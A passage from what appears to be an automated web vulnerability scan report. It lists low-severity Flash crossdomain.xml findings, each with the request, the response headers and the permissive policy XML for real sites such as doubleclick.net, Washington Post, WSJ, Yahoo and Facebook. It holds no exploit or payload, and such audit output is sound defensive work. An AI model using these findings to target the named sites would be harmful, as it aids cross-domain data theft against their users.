Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...
8.80. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 01 May 2011 03:42:34 GMT
Expires: Mon, 02 May 2011 03:42:34 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 70952
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...
8.81. http://media.washingtonpost.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://media.washingtonpost.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.washingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 06 Feb 2011 23:42:57 GMT
Content-Type: application/xml
Content-Length: 478
X-Cnection: close
Cache-Control: must-revalidate, max-age=456
Date: Sun, 01 May 2011 23:33:16 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.washingtonpost.com"/>
<allow-access-from domain="admin.brightcove.com"/>
<allow-access-from domain="*.newsweek.com"/>
<allow-access-from domain="*.digitalink.com"/>
<allow-access-from domain="*.slate.com"/>
<allow-access-from domain="livingstories.googlelabs.com"/>
...[SNIP]...
8.82. http://news.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: news.yahoo.com

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:33:17 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 04 Aug 2006 08:27:42 GMT
Accept-Ranges: bytes
Content-Length: 228
Vary: Accept-Encoding
Content-Type: application/xml
Age: 0
Server: YTS/1.19.4

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...
8.83. http://online.wsj.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: online.wsj.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:43:02 GMT
Server: Apache
Last-Modified: Wed, 23 Feb 2011 22:18:09 GMT
Accept-Ranges: bytes
Content-Length: 3499
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=47
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
    <allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.doubleclick.com"/>
    <allow-access-from domain="m.doubleclick.net"/>
    <allow-access-from domain="*.dowjonesonline.com"/>
    <allow-access-from domain="www.dowjonesonline.com"/>
    <allow-access-from domain="a.marketwatch.com"/>
    <allow-access-from domain="*.marketwatch.com"/>
    <allow-access-from domain="www.akamai.com"/>
    <allow-access-from domain="*.akamai.com"/>
    <allow-access-from domain="www.wsj.com"/>
    <allow-access-from domain="*.wsj.com"/>
    <allow-access-from domain="s.dev.wsj.com"/>
    <allow-access-from domain="idev.online.wsj.com"/>
    <allow-access-from domain="s.wsjsat.dowjones.net"/>
    <allow-access-from domain="s.s.dev.wsj.com"/>
<allow-access-from domain="reno.wsjqa.dowjones.net"/>
    <allow-access-from domain="*.online.wsj.com"/>
...[SNIP]...
<allow-access-from domain="quotes.wsj.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="public.wsj.com"/>
    <allow-access-from domain="*.public.wsj.com"/>
<allow-access-from domain="www.barrons.com"/>
    <allow-access-from domain="*.barrons.com"/>
...[SNIP]...
<allow-access-from domain="idev.online.barrons.com"/>
    <allow-access-from domain="*.online.barrons.com"/>
    <allow-access-from domain="online.barrons.com"/>
    <allow-access-from domain="public.barrons.com"/>
    <allow-access-from domain="*.public.barrons.com"/>
    <allow-access-from domain="*.aol.com"/>
    <allow-access-from domain="*.brightcove.com"/>
    <allow-access-from domain="creatives.doubleclick.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="wsjdigital.com"/>
...[SNIP]...
<allow-access-from domain="*.cooliris.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.piclens.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dowjones.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="online.s.dev.wsj.com"/>
    <allow-access-from domain="quotes.s.dev.wsj.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="polls.s.dev.wsj.com"/>
<allow-access-from domain="blogs.s.dev.wsj.com"/>
<allow-access-from domain="triplewebdesign.com"/>
<allow-access-from domain="ingyournumber.com"/>
   <allow-access-from domain="*.ingyournumber.com"/>
<allow-access-from domain="*.issuu.com"/>
   <allow-access-from domain="static.issuu.com"/>
    <allow-access-from domain="professional.s.dev.wsj.com"/>
    <allow-access-from domain="*.dartmotif.com"/>
    <allow-access-from domain="wsjradio.com"/>
    <allow-access-from domain="*.wsjradio.com"/>
    <allow-access-from domain="www.wsjradio.com"/>
    <allow-access-from domain="*.eyereturn.com"/>
<allow-access-from domain="fxtrader.l.dev.dowjones.com"/>
    <allow-access-from domain="fxtrader.f.dev.dowjones.com"/>
    <allow-access-from domain="fxtrader.s.dev.dowjones.com"/>
    <allow-access-from domain="fxtrader.dowjones.com"/>
    <allow-access-from domain="dowjones.visualla.com"/>
...[SNIP]...
8.84. http://pagead2.googlesyndication.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 01 May 2011 20:07:48 GMT
Expires: Mon, 02 May 2011 20:07:48 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 21059

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...
8.85. http://pubads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Sun, 01 May 2011 03:22:47 GMT
Expires: Mon, 02 May 2011 03:22:47 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 81321
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...
8.86. http://s28.sitemeter.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://s28.sitemeter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: s28.sitemeter.com

Response

HTTP/1.1 200 OK
Content-Length: 219
Content-Type: text/xml
Last-Modified: Wed, 25 Oct 2006 21:31:00 GMT
Accept-Ranges: bytes
ETag: "025bdd7cf8c61:83fd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 01:56:33 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.sitemeter.com" />
</cro
...[SNIP]...
8.87. http://static.ak.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.30.147.196
X-Cnection: close
Date: Sun, 01 May 2011 23:34:44 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...
8.88. http://tomopop.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://tomopop.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: tomopop.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "2983888878"
Last-Modified: Wed, 19 May 2010 22:15:37 GMT
Content-Length: 215
Connection: close
Date: Mon, 02 May 2011 02:03:31 GMT
Server: lighttpd/1.4.28

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.cooliris.com" />
</cross
...[SNIP]...
8.89. http://www.admez.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.admez.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.admez.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:37:02 GMT
Server: Apache
Last-Modified: Wed, 07 Jul 2010 11:45:11 GMT
ETag: "cf6f56-129-48acab3c67fc0"
Accept-Ranges: bytes
Content-Length: 297
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="admez.com" />
   <allow-access-from domain="*.admez.com" />
   <allow-access-from domain="localhost" />
...[SNIP]...
8.90. http://www.anilinkz.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.anilinkz.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.anilinkz.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:33:34 GMT
Server: Apache
Last-Modified: Tue, 31 Aug 2010 20:59:21 GMT
ETag: "398000a-101-48f24dae6dc40"
Accept-Ranges: bytes
Content-Length: 257
Cache-Control: max-age=604800, public, must-revalidate
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.anilinkz.com"/>
<allow-access-from domain="*.aniforums.com"/>
...[SNIP]...
8.91. http://www.awltovhc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.awltovhc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.awltovhc.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
Content-Type: text/xml
Date: Mon, 02 May 2011 02:19:10 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="www.supersavvyme.com" />
<allow-access-from domain="*.intuit.com" />
<allow-access-from domain="www.dim.fr" />
<allow-access-from domain="*.dim-privileges.com" />
<allow-access-from domain="*.konbini.com" />
<allow-access-from domain="*.loomisdev.com" />
<allow-access-from domain="*.loomisgroup.com" />
...[SNIP]...
8.92. http://www.bingo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bingo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bingo.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 May 2011 00:18:03 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Mon, 10 May 2010 15:23:30 GMT
Accept-Ranges: bytes
Content-Length: 2050
Cache-Control: max-age=2592000
Expires: Wed, 01 Jun 2011 00:01:36 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.amorbingo.com" secure="true" />

...[SNIP]...
<allow-access-from domain="*.bettybingo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.bingo.se" secure="true" />
...[SNIP]...
<allow-access-from domain="*.caratbingo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.caratcasino.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cupidocasino.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.fruitybingo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.kroonikabingo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.mariabingo.be" secure="true" />
...[SNIP]...
<allow-access-from domain="*.mariabingo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.mariabingo.de" secure="true" />
...[SNIP]...
<allow-access-from domain="*.mariabingo.fi" secure="true" />
...[SNIP]...
<allow-access-from domain="*.mariabingo.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.mariabingo.nl" secure="true" />
...[SNIP]...
<allow-access-from domain="*.mariacasino.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.mariacasino.de" secure="true" />
...[SNIP]...
<allow-access-from domain="*.mariacasino.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.mariapoker.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.oliviabingo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.oliviabingo.fi" secure="true" />
...[SNIP]...
<allow-access-from domain="*.oliviacasino.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.parabolgames.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.seiska.fi" secure="true" />
...[SNIP]...
<allow-access-from domain="*.unibetbingo.se" secure="true" />
...[SNIP]...
<allow-access-from domain="*.violetbingo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.violetcasino.com" secure="true" />
...[SNIP]...
<allow-access-from domain="unicdn.hs.llnwd.net" secure="true" />
...[SNIP]...
<allow-access-from domain="adserving.unibet.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.goorps.com" secure="false" />
...[SNIP]...
8.93. http://www.chrisbrownworld.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.chrisbrownworld.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.chrisbrownworld.com

Response

HTTP/1.1 200 OK
